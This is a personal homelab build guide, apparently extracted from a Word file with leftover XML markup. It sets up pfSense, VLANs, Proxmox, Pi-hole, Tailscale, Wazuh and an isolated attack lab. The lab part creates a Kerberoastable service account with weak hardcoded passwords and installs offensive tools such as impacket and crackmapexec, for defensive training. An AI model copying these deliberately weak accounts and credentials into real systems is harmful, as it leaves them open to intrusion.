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HOMELAB BUILD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Anton Leslie — Personal Build Reference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Complete step-by-step instructions · 14 steps · all commands included</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="8" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/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NETWORK QUICK REFERENCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="1F3864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pfSense — VLAN 10 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1F3864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192.168.10.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="1F3864" w:sz="4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pfSense — VLAN 30 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1F386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192.168.30.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="1F3864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Pi-hole DNS (VM on Proxmox)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1F3864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192.168.10.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="1F3864" w:sz="4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Proxmox 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1F386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192.168.30.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="1F3864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Wazuh SIEM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1F3864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192.168.30.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="1F3864" w:sz="4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OpenVAS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1F386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192.168.30.30</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="1F3864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Switch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1F3864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192.168.30.200</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="1F3864" w:sz="4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Kali Linux (vmbr2 isolated)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1F386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10.10.10.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="1F3864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Windows Server 2022 DC (vmbr2)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1F3864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10.10.10.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="1F3864" w:sz="4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Windows 10 victim (vmbr2)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1F386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10.10.10.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="1F3864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Metasploitable 2 (vmbr2)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1F3864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10.10.10.30</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing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4F00" w:sz="4"/>
              <w:left w:val="single" w:color="7B4F00" w:sz="16"/>
              <w:bottom w:val="single" w:color="7B4F00" w:sz="4"/>
              <w:right w:val="single" w:color="7B4F00" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF4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Pi-hole runs as a VM on Proxmox (VLAN 10). pfSense runs on a separate dedicated device.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="2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4160"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr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Slate 7 WAN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Physical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DMZ mode, WAN passthrough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pfSense firewall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Physical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VLANs, DHCP, firewall rules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Managed switch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Physical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802.1Q trunk + access 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Proxmox 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Physical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Hypervisor + vmbr0 + vmbr2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Pi-hole VM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Proxmox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DNS + Cloudflared DoH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Tailscale VPN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Software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Remote access, subnet routing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Wazuh SIEM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Proxmox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Log aggregation, SIEM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Windows Server 2022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Cyber lab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Domain controller, lab.local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Windows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Cyber lab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Domain-joined victim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Kali Linux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Cyber lab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Attacker VM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Metasploitable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Cyber lab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Vulnerable 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Suricata IDS/IPS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pfSense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WAN intrusion detection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OpenVAS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Proxmox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Vulnerability scanner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Attack exercises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 exercises + IR reports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AAFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28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GL.INET SLATE 7 — WAN SETUP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Physical device · DMZ mode · WAN passthrough to pfSense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4F00" w:sz="4"/>
              <w:left w:val="single" w:color="7B4F00" w:sz="16"/>
              <w:bottom w:val="single" w:color="7B4F00" w:sz="4"/>
              <w:right w:val="single" w:color="7B4F00" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF4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pfSense is a SEPARATE physical device. The Slate 7 passes the public WAN IP directly to pfSense using DMZ mode.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Physical Connections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Wire up in this exact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ISP modem LAN port  →  Slate 7 WAN port  (ethernet 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Slate 7 LAN port  →  pfSense WAN NIC  (ethernet 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Power on Slate 7. Wait 60 seconds to boot.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Access Admin Panel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Connect your laptop to Slate 7 via Wi-Fi or ethernet.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Open browser → http://192.168.8.1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a strong admin password when prompted — write it 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to:  Internet → Cable  — confirm you see a public IP from ISP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Enable DMZ Mode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DMZ forwards ALL inbound traffic to pfSense so it gets the real public IP.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More Settings → Network → DMZ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Enable DMZ: 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DMZ Host IP:  192.168.8.2  (pfSense WAN interface)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Save and Apply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Harden the Slate 7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More Settings → Administration → SSH: Disable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More Settings → Administration → Remote Access: Disable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More Settings → Cloud → GL.iNet Cloud: Disable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Wireless → Disable 2.4GHz and 5GHz if not needed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Slate 7 WAN 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Public IP from ISP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Slate 7 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192.168.8.1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DMZ enabled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 → pointing to 192.168.8.2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 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Changed from default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4"/>
              <w:left w:val="single" w:color="2E5FA3" w:sz="16"/>
              <w:bottom w:val="single" w:color="2E5FA3" w:sz="4"/>
              <w:right w:val="single" w:color="2E5FA3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Screenshot the DMZ settings page and save to: 01-slate7-wan-setup/screenshots/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AAFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28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PFSENSE FIREWALL SETUP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Separate physical device · VLANs · DHCP · firewall rules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4F00" w:sz="4"/>
              <w:left w:val="single" w:color="7B4F00" w:sz="16"/>
              <w:bottom w:val="single" w:color="7B4F00" w:sz="4"/>
              <w:right w:val="single" w:color="7B4F00" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF4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pfSense runs on a dedicated mini PC or Protectli vault with 2 NICs — WAN (from Slate 7) and LAN (to switch).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 — Install pfSense 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Download pfSense CE ISO from  https://www.pfsense.org/download/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Flash to USB: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diskutil list                         # find USB disk e.g. /dev/disk2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diskutil unmountDisk /dev/disk2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dd if=pfSense-CE-*.iso of=/dev/rdisk2 bs=1m status=progress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Boot mini PC from USB → follow installer → accept defaults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asked to assign NICs:  WAN = NIC connected to Slate 7 LAN,  LAN = NIC to switch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reboot: WAN shows 192.168.8.2,  LAN shows 192.168.1.1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 — First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Connect laptop directly to pfSense LAN NIC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Open browser → http://192.168.1.1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Username: admin    Password: pfsense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IMMEDIATELY change password: System → User Manager → admin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2.3 — Setup Wizard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 → Setup Wizard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Hostname: pfsense  |  Domain: homelab.local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Primary DNS: leave blank  (Pi-hole handles this after Step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WAN: DHCP  (gets 192.168.8.2 from Slate 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LAN IP: 192.168.10.1  /  Subnet: 255.255.255.0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strong admin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Finish. Browser will redirect to http://192.168.10.1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2.4 — Create VLANs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Interfaces → Assignments → VLANs → Add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VLAN 10:  Parent = igb1 (your LAN NIC)  |  Tag = 10  |  Description = TRUSTED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VLAN 30:  Parent = igb1  |  Tag = 30  |  Description = LAB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Save after each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4"/>
              <w:left w:val="single" w:color="2E5FA3" w:sz="16"/>
              <w:bottom w:val="single" w:color="2E5FA3" w:sz="4"/>
              <w:right w:val="single" w:color="2E5FA3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Find your LAN NIC name under Interfaces → Assignments. It may be igb0, igb1, em0, etc.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2.5 — Assign VLAN Interfaces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Interfaces → Assignments → select VLAN 10 → Add → configure OPT1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OPT1 (VLAN 10):  Enable ✓  |  Description: TRUSTED  |  IPv4: Static  |  IP: 192.168.10.1/24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Add VLAN 30 → configure OPT2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OPT2 (VLAN 30):  Enable ✓  |  Description: LAB  |  IPv4: Static  |  IP: 192.168.30.1/24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Save → Apply Changes after each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2.6 — Configure DHCP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Services → DHCP Server → TRUSTED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Enable ✓  |  Range: 192.168.10.100 – 192.168.10.200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DNS Server 1: 192.168.10.2  (Pi-hole — leave even though not built yet)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DNS Server 2: LEAVE BLANK  — forces all clients through Pi-hole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Gateway: 192.168.10.1  |  Save</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="4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Services → DHCP Server → LAB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Enable ✓  |  Range: 192.168.30.100 – 192.168.30.200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DNS Server 1: 192.168.10.2  |  Gateway: 192.168.30.1  |  Save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2.7 — Firewall Rules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Firewall → Rules → TRUSTED tab → Add rules in this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Rule 1 — Allow internet:  Pass | TCP/UDP | Source: TRUSTED net | Dest: any | Port: 80,443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Rule 2 — Allow DNS to Pi-hole:  Pass | TCP/UDP | Source: TRUSTED net | Dest: 192.168.10.2 | Port: 53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Rule 3 — Block to lab:  Block | Source: TRUSTED net | Dest: LAB net</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="4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Firewall → Rules → LAB tab → Add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Rule 1 — Allow internet:  Pass | TCP/UDP | Source: LAB net | Dest: any | Port: 80,443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Rule 2 — Allow DNS:  Pass | TCP/UDP | Source: LAB net | Dest: 192.168.10.2 | Port: 53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Rule 3 — Block to trusted:  Block | Source: LAB net | Dest: TRUSTED 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Apply Changes after all rules are added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2.8 — Syslog to Wazuh (do after Step 7)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Status → System Logs →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Enable Remote Logging ✓  |  Server: 192.168.30.20  |  Port: 514  |  Protocol: UDP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Check: Firewall Events, DHCP Events, System Events, Authentication Events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pfSense web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Loads at http://192.168.10.1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WAN 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192.168.8.2 (from Slate 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VLAN 10 interface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192.168.10.1/24 — TRUSTED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VLAN 30 interface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192.168.30.1/24 — LAB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DHCP TRUSTED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Serving 192.168.10.100-.200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DHCP DNS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Only 192.168.10.2 — no backup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Firewall rules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Block rules at bottom of each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AAFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28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MANAGED SWITCH — VLAN CONFIG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8-port switch · 802.1Q trunk · access ports per VLAN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Port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5960"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr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VLAN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr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10, 30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pfSense LAN NIC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Pi-hole VM (VLAN 10)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Trusted laptop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Proxmox server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5–8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Available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Configuration Steps (TP-Link TL-SG108E)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Connect laptop directly to switch — access admin at  http://192.168.0.1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switch management IP: System → IP Setting → 192.168.30.200 / gateway 192.168.30.1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Reconnect laptop to port 4 → access at  http://192.168.30.200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="4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VLAN → 802.1Q VLAN → Enable → Apply</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing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Create VLAN 10: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VLAN ID: 10 | Name: TRUSTED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Port 1: Tagged  |  Port 2: Untagged  |  Port 3: Untagged  |  All others: Not Member</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing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Create VLAN 30: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VLAN ID: 30 | Name: LAB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Port 1: Tagged  |  Port 4: Untagged  |  All others: Not Member</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="4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VLAN → 802.1Q PVID Setting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Port 1: PVID 1  |  Port 2: PVID 10  |  Port 3: PVID 10  |  Port 4: PVID 30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Apply → plug pfSense LAN NIC into port 1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C" w:sz="4"/>
              <w:left w:val="single" w:color="1E6B3C" w:sz="16"/>
              <w:bottom w:val="single" w:color="1E6B3C" w:sz="4"/>
              <w:right w:val="single" w:color="1E6B3C" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E2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VERIFY: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Test: plug laptop into port 3. Should get 192.168.10.x IP. If you get 169.254.x.x — recheck PVID settings.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AAFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28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PROXMOX VE — HYPERVISOR SETUP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Install · vmbr0 management · vmbr2 isolated lab bridge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4F00" w:sz="4"/>
              <w:left w:val="single" w:color="7B4F00" w:sz="16"/>
              <w:bottom w:val="single" w:color="7B4F00" w:sz="4"/>
              <w:right w:val="single" w:color="7B4F00" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF4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Proxmox replaces all physical lab hardware. Pi-hole, Wazuh, OpenVAS, and ALL cyber lab VMs run here.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 — Install Proxmox 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Download Proxmox VE ISO from  https://www.proxmox.com/downloads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Flash to USB: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diskutil list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dd if=proxmox-ve_*.iso of=/dev/rdisk2 bs=1m status=progress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Boot server from USB → installer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Network config during install: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Hostname:    proxmox.homelab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IP Address:  192.168.30.10/24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Gateway:     192.168.30.1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DNS:         192.168.10.2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root password → complete install → reboot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Plug Proxmox NIC into switch port 4 (VLAN 30)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Access web UI:  https://192.168.30.10:8006  |  Login: root + your password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 — Switch to Community Repo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Run in Proxmox Shell (click node name → Shell):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sed -i 's/^deb/#deb/' /etc/apt/sources.list.d/pve-enterprise.list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sed -i 's/^deb/#deb/' /etc/apt/sources.list.d/ceph.list 2&gt;/dev/null ||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echo "deb http://download.proxmox.com/debian/pve bookworm pve-no-subscription" &gt;&gt; /etc/apt/sources.list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apt update &amp;&amp; apt dist-upgrade -y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apt install -y htop iotop net-tools tcpdump curl wget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4.3 — Configure Virtual Bridges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Find your NIC name first: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ip link show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Look for: enp1s0, eno1, eth0 — use whatever appears. Then edit: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nano /etc/network/interfaces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Delete everything. Paste this (replace enp1s0 with YOUR NIC name):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing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4F00" w:sz="4"/>
              <w:left w:val="single" w:color="7B4F00" w:sz="16"/>
              <w:bottom w:val="single" w:color="7B4F00" w:sz="4"/>
              <w:right w:val="single" w:color="7B4F00" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF4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enp1s0 with your actual NIC name from ip link show</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="4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auto lo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iface lo inet loopback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auto enp1s0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iface enp1s0 inet manual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vmbr0 — Management — VLAN 30 — Wazuh, OpenVAS, Proxmox mgmt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auto vmbr0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iface vmbr0 inet static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address 192.168.30.10/24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gateway 192.168.30.1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bridge-ports enp1s0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bridge-stp off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bridge-fd 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bridge-vlan-aware yes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bridge-vids 30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vmbr2 — ISOLATED cyber lab — NO uplink, NO VLAN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auto vmbr2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iface vmbr2 inet manual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bridge-ports none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bridge-stp off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bridge-fd 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Static route — lab VMs push logs to Wazuh port 1514 ONLY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post-up   ip route add 10.10.10.0/24 via 192.168.30.20 dev vmbr0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pre-down  ip route del 10.10.10.0/24 via 192.168.30.20 dev vmbr0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing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Save (Ctrl+X → Y → Enter) then apply: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systemctl restart networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing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Verify: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ip addr show vmbr0    # should show 192.168.30.10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ip addr show vmbr2    # should show NO IP (correct)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ip route | grep 10.10.10   # should show route via 192.168.30.20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4.4 — Download Ubuntu Template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pveam update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pveam download local ubuntu-22.04-standard_22.04-1_amd64.tar.zst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Proxmox web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Loads at https://192.168.30.10:8006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vmbr0 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192.168.30.10/24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vmbr2 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IP (intentional)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Static route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10.10.10.0/24 via 192.168.30.20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Ubuntu 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Visible in local → CT Templates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AAFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28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PI-HOLE — DNS FILTERING + DOH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VM on Proxmox · VLAN 10 · Cloudflared DNS over HTTPS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4F00" w:sz="4"/>
              <w:left w:val="single" w:color="7B4F00" w:sz="16"/>
              <w:bottom w:val="single" w:color="7B4F00" w:sz="4"/>
              <w:right w:val="single" w:color="7B4F00" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF4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Pi-hole runs as a VM on Proxmox, NOT on a Raspberry Pi. It sits on VLAN 10 at 192.168.10.2.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5.1 — Create Pi-hole VM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Proxmox web UI → Create CT (top right):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CT ID: 100  |  Hostname: pihole  |  Password: (strong)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Template: ubuntu-22.04-standard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Disk: 8 GB  |  CPU: 1 core  |  RAM: 512 MB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Network: Bridge vmbr0 | VLAN Tag: 10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IPv4: Static | IP: 192.168.10.2/24 | Gateway: 192.168.10.1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DNS: 1.1.1.1 (temporary until Pi-hole itself is running)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Finish → Start container → Open Console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5.2 — Install Pi-hole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apt update &amp;&amp; apt upgrade -y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-sSL https://install.pi-hole.net | bash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During installer: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Upstream DNS: Custom → enter  127.0.0.1#5053  (Cloudflared — set up next)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 web interface: Yes  |  Log queries: Yes  |  Privacy: Show everything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After install, set admin password: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pihole -a -p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Access at:  http://192.168.10.2/admin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5.3 — Install Cloudflared (DNS over HTTPS)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wget -q https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64.deb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dpkg -i cloudflared-linux-amd64.deb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mkdir -p /etc/cloudflared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Create config file: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cat &gt; /etc/cloudflared/config.yml &lt;&lt; 'EOF'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proxy-dns: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proxy-dns-port: 5053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proxy-dns-upstream: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https://1.1.1.1/dns-query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https://1.0.0.1/dns-query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EOF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cloudflared service install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systemctl enable cloudflared &amp;&amp; systemctl start cloudflared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Verify DoH is working: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dig @127.0.0.1 -p 5053 google.com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C" w:sz="4"/>
              <w:left w:val="single" w:color="1E6B3C" w:sz="16"/>
              <w:bottom w:val="single" w:color="1E6B3C" w:sz="4"/>
              <w:right w:val="single" w:color="1E6B3C" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E2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VERIFY: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should see a valid DNS response. If not, check cloudflared service status.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5.4 — Add Blocklists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Pi-hole admin panel → Group Management → Adlists → Add each URL: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https://big.oisd.nl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https://raw.githubusercontent.com/StevenBlack/hosts/master/hosts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https://urlhaus.abuse.ch/downloads/rpz/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Then update gravity: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pihole -g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Pi-hole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Loads at http://192.168.10.2/admin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Upstream DNS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Settings → DNS shows 127.0.0.1#5053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Blocked domains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1M+ shown on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DNS from laptop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nslookup google.com shows server 192.168.10.2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Blocked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nslookup doubleclick.net returns 0.0.0.0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AAFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28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TAILSCALE VPN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Zero-trust remote access · pfSense + Proxmox · no open ports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6.1 — Create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 https://tailscale.com  → Sign up (free)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Note your tailnet name: yourname.tailnet-xyz.ts.net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6.2 — Install on pfSense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 → Package Manager → Available Packages → search tailscale → Install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VPN → Tailscale → Authentication → Authenticate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Copy the URL → open in browser → authorize pfSense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VPN → Tailscale →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Enable Tailscale ✓  |  Advertised routes: 192.168.10.0/24  |  Accept DNS: unchecked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Approve route in Tailscale admin: https://login.tailscale.com/admin → Machines → pfSense → Edit route settings → approve 192.168.10.0/24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6.3 — Install on Proxmox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-fsSL https://tailscale.com/install.sh | sh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tailscale up --advertise-routes=192.168.30.0/24 --ssh --accept-dns=false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the printed URL → authorize Proxmox in browser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systemctl enable tailscaled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Approve 192.168.30.0/24 route in Tailscale admin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6.4 — Install on Laptop and Phone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Mac laptop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-fsSL https://tailscale.com/install.sh | sh &amp;&amp; tailscale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Phone: install Tailscale app from App Store / Google Play → sign in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6.5 — Test Remote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phone — turn off Wi-Fi, use mobile data → enable Tailscale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ping 192.168.30.10    # Proxmox — should respond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ping 192.168.10.2     # Pi-hole — should respond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phone browser:  https://192.168.30.10:8006  →  Proxmox should load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pfSense in Tailscale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Shows as Connected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Proxmox in Tailscale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Shows as Connected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192.168.10.0/24 route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Approved in admin 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192.168.30.0/24 route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Approved in admin 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Remote access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Proxmox loads on phone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AAFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP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WAZUH SIEM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VM on Proxmox · log aggregation · custom detection rules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0000" w:sz="4"/>
              <w:left w:val="single" w:color="8B0000" w:sz="16"/>
              <w:bottom w:val="single" w:color="8B0000" w:sz="4"/>
              <w:right w:val="single" w:color="8B0000" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FDE8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CRITICAL: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Wazuh BEFORE any cyber lab VMs so you can install agents on each VM as you create it.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7.1 — Create Wazuh VM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Proxmox → Create CT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CT ID: 101  |  Hostname: wazuh  |  Password: (strong)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Template: ubuntu-22.04-standard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Disk: 50 GB  |  CPU: 4 cores  |  RAM: 8192 MB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Network: vmbr0 | VLAN Tag: 30 | IPv4: Static | IP: 192.168.30.20/24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Gateway: 192.168.30.1  |  DNS: 192.168.10.2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Finish → Start → Open Console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7.2 — Install Wazuh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apt update &amp;&amp; apt upgrade -y &amp;&amp; apt install -y curl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-sO https://packages.wazuh.com/4.7/wazuh-install.sh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-sO https://packages.wazuh.com/4.7/config.yml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Edit config.yml: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nano config.yml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Replace all content with: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nodes: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indexer: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name: node-1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ip: "192.168.30.20"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server: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name: wazuh-1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ip: "192.168.30.20"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dashboard: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name: dashboard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ip: "192.168.30.20"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Run installer (takes 10–15 min):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bash wazuh-install.sh -a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0000" w:sz="4"/>
              <w:left w:val="single" w:color="8B0000" w:sz="16"/>
              <w:bottom w:val="single" w:color="8B0000" w:sz="4"/>
              <w:right w:val="single" w:color="8B0000" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FDE8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CRITICAL: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THE ADMIN PASSWORD printed at the end. You cannot recover it easily.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7.3 — Access Dashboard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https://192.168.30.20   Username: admin   Password: (from installer)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7.4 — Add Custom Detection Rules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nano /var/ossec/etc/rules/lab-custom-rules.xml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Paste the content of  08-wazuh-siem/custom-rules.xml  from your GitHub repo.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systemctl restart wazuh-manager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/var/ossec/bin/wazuh-logtest   # verify no errors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7.5 — Configure pfSense Syslog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Now go back to pfSense and complete Step 2.8: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Status → System Logs → Settings → enable remote logging → 192.168.30.20:514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Wazuh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Loads at https://192.168.30.20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Custom rules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Loaded without errors in wazuh-logtest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pfSense syslog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Events appear in Wazuh Security Events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AAFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP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WINDOWS SERVER 2022 — DOMAIN CONTROLLER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vmbr2 isolated · lab.local domain · Kerberoasting targets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0000" w:sz="4"/>
              <w:left w:val="single" w:color="8B0000" w:sz="16"/>
              <w:bottom w:val="single" w:color="8B0000" w:sz="4"/>
              <w:right w:val="single" w:color="8B0000" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FDE8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CRITICAL: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cyber lab VMs connect ONLY to vmbr2 — no VLAN tag, no uplink. They cannot reach the internet.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8.1 — Create VM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VM ID: 201  |  Name: dc01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OS: Windows Server 2022 ISO  |  Type: Microsoft Windows  |  Version: 2022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System: OVMF (UEFI), Machine: q35, Add TPM v2.0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Disk: VirtIO SCSI, 60 GB  |  CPU: 2 cores  |  RAM: 4096 MB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Network: Bridge vmbr2 | Model: VirtIO | NO VLAN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second CD drive with virtio-win.iso before clicking Finish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Download virtio-win.iso:  https://fedorapeople.org/groups/virt/virtio-win/direct-downloads/stable-virtio/virtio-win.iso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8.2 — Install Windows Server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Start VM → Console → Windows installer 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Select: Windows Server 2022 Standard (Desktop Experience)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 install → Load driver → Browse virtio CD → viostor\2k22\amd64 → install disk driver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Disk appears → install Windows → set Administrator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boot: open File Explorer → virtio CD → run  virtio-win-gt-x64.msi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8.3 — Set Static IP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Control Panel → Network → Ethernet → Properties → IPv4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IP: 10.10.10.10  |  Mask: 255.255.255.0  |  Gateway: (blank)  |  DNS: 127.0.0.1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8.4 — Promote to Domain Controller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 PowerShell as Administrator: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Install-WindowsFeature AD-Domain-Services -IncludeManagementTools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Install-ADDSForest `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-DomainName "lab.local" `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-DomainNetbiosName "LAB" `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-InstallDns `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-SafeModeAdministratorPassword (ConvertTo-SecureString 'Lab@Password123!' -AsPlainText -Force) `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-Force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Server reboots → login as LAB\Administrator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8.5 — Create Lab Users and Kerberoasting Target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New-ADOrganizationalUnit -Name 'Users' -Path 'DC=lab,DC=local'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New-ADUser -Name 'jsmith' -SamAccountName 'jsmith' `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-UserPrincipalName 'jsmith@lab.local' `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-Path 'OU=Users,DC=lab,DC=local' `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-AccountPassword (ConvertTo-SecureString 'Password123!' -AsPlainText -Force) `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-Enabled $true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Service account with SPN — Kerberoasting target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New-ADUser -Name 'svc-sql' -SamAccountName 'svc-sql' `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-Path 'OU=Users,DC=lab,DC=local' `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-AccountPassword (ConvertTo-SecureString 'ServicePass1!' -AsPlainText -Force) `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-Enabled $true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Set-ADUser -Identity 'svc-sql' -ServicePrincipalNames @{Add='MSSQLSvc/dc01.lab.local:1433'}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8.6 — Enable Audit Policies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auditpol /set /subcategory:'Kerberos Authentication Service' /success:enable /failure:enable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auditpol /set /subcategory:'Kerberos Service Ticket Operations' /success:enable /failure:enable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auditpol /set /subcategory:'Logon' /success:enable /failure:enable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auditpol /set /subcategory:'Process Creation' /success:enable /failure:enable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auditpol /set /subcategory:'Sensitive Privilege Use' /success:enable /failure:enable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reg add 'HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging' /v EnableScriptBlockLogging /t REG_DWORD /d 1 /f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8.7 — Install Wazuh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Wazuh dashboard → Agents → Deploy new agent → Windows → Manager IP: 192.168.30.20 → Agent name: dc01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Copy the PowerShell command shown → run as Administrator on dc01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NET START WazuhSvc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 in Wazuh: Agents → dc01 shows Active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8.8 — Snapshot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Run in Proxmox shell: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qm snapshot 201 clean-state --description 'Clean DC before any lab'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DC boots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Windows Server 2022 Desktop loads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Domain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lab.local — get-adforest shows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Users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jsmith, svc-sql exist in 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SPN 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Get-ADUser svc-sql -Properties SPN shows MSSQLSvc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Wazuh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dc01 shows Active in Wazuh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Snapshot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clean-state snapshot exists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AAFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP 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WINDOWS 10 — VICTIM WORKSTATION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vmbr2 isolated · domain joined · Wazuh agent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9.1 — Create VM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VM ID: 202  |  Name: win10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OS: Windows 10 ISO  |  System: OVMF, q35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Disk: VirtIO SCSI, 60 GB  |  CPU: 2 cores  |  RAM: 4096 MB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Network: vmbr2 | VirtIO | NO VLAN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virtio-win.iso as second CD. Finish → Start.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9.2 — Install Windows 10 Pro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 Windows 10 Pro during install (needed for domain join)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 VirtIO network driver: File Explorer → virtio CD → NetKVM\w10\amd64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 run virtio-win-gt-x64.msi from CD root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9.3 — Configure IP and Join Domain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IP: 10.10.10.20  |  Mask: 255.255.255.0  |  Gateway: (blank)  |  DNS: 10.10.10.10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Settings → System → About → Domain → Join → lab.local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Credentials:  LAB\Administrator  +  Lab@Password123!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Reboot → login as  LAB\jsmith  (Password123!)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9.4 — Install Wazuh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Wazuh dashboard → Deploy new agent → Windows → Manager: 192.168.30.20 → Name: win10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PowerShell command on Win10 → NET START WazuhSvc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Verify: win10 shows Active in Wazuh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9.5 — Snapshot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qm snapshot 202 clean-state --description 'Clean Win10 domain joined'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AAFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP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KALI LINUX — ATTACKER VM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vmbr2 isolated · attack tools · verify isolation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10.1 — Create VM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VM ID: 200  |  Name: kali-attacker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OS: Kali Linux ISO (installer, not live)  |  Type: Linux, Debian 11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System: OVMF  |  Disk: VirtIO SCSI, 80 GB  |  CPU: 2 cores  |  RAM: 4096 MB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Network: vmbr2 | VirtIO | NO VLAN tag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10.2 — Install Kali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Boot → Graphical Install → Hostname: kali → Username: kali → full disk install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10.3 — Set Static IP and Hosts File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nano /etc/network/interfaces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auto eth0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iface eth0 inet static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address 10.10.10.5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netmask 255.255.255.0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systemctl restart networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="4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nano /etc/hosts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these lines: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10.10.10.5    kali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10.10.10.10   dc01 dc01.lab.local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10.10.10.20   win10 win10.lab.local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10.10.10.30   metasploitable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10.4 — Update Tools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update &amp;&amp; sudo apt upgrade -y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install -y bloodhound neo4j impacket-scripts crackmapexec evil-winrm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10.5 — CRITICAL: Test Isolation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0000" w:sz="4"/>
              <w:left w:val="single" w:color="8B0000" w:sz="16"/>
              <w:bottom w:val="single" w:color="8B0000" w:sz="4"/>
              <w:right w:val="single" w:color="8B0000" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FDE8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CRITICAL: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These tests confirm your lab is properly isolated. MUST verify before running any exercises.</w:t>
            </w:r>
          </w:p>
